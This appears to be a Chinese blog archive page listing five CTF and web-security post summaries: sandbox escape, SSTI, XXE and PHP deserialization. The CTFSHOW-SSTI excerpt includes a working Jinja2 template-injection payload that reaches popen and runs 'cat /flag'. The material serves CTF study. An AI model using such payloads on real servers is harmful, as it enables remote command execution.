08 2023 档案

沙箱逃逸
发表于 2023-08-10 10:57阅读:288评论:0推荐:0
摘要:# 沙箱逃逸 ## 概述 > 沙箱逃逸就是在在一个严格限制的python环境中,通过绕过限制和过滤达到执行更高权限,甚至getshell的过程。 在此之前我有点搞混flask框架的SSTI注入绕过和沙箱逃逸这俩东西了 - 沙箱指的的限制代码执行的环境,以获取越权访问或执行危险操作的能力。沙箱逃逸是一 阅读全文 »
posted @ 2023-08-10 10:57 Solitude0c 阅读(288) 评论(0) 推荐(0) 编辑
CTFSHOW-SSTI
发表于 2023-08-09 10:02阅读:191评论:0推荐:0
摘要:# CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` 阅读全文 »
posted @ 2023-08-09 10:02 Solitude0c 阅读(191) 评论(0) 推荐(0) 编辑
SSTI 服务器端模板注入
发表于 2023-08-09 10:02阅读:124评论:0推荐:0
摘要:# SSTI 服务器端模板注入 ## flask基础 > 不正确的使用模板引擎进行渲染时,则会造成模板注入 **路由** ``` from flask import flask @app.route('/index/') def hello_word(): return 'hello word' ` 阅读全文 »
posted @ 2023-08-09 10:02 Solitude0c 阅读(124) 评论(0) 推荐(0) 编辑
XXE
发表于 2023-08-03 10:36阅读:110评论:0推荐:0
摘要:# XXE ## XML简单介绍 > XML全称可扩展标记语言(EXtensible Markup Language)。 > > XML和HTML的语言风格很像,都是标记语言,有对应的tag,唯一不同的就是作用,XML侧重于数据传输,HTML注重与标记语言 ## XML的基本格式 ``` Every 阅读全文 »
posted @ 2023-08-03 10:36 Solitude0c 阅读(110) 评论(0) 推荐(0) 编辑
PHP反序列化
发表于 2023-08-02 10:02阅读:118评论:0推荐:0
摘要:# PHP反序列化 ## 序列化 - 序列化的作用 **将对象或者数组转化为可存储/传输的字符串** - 对象序列化 ``` O:4:"info":3:{s:4:"name";s:7:"iami233";s:6:"\x00*\x00age";s:2:"18";s:8:"\x00ctf\x00sex" 阅读全文 »
posted @ 2023-08-02 10:02 Solitude0c 阅读(118) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示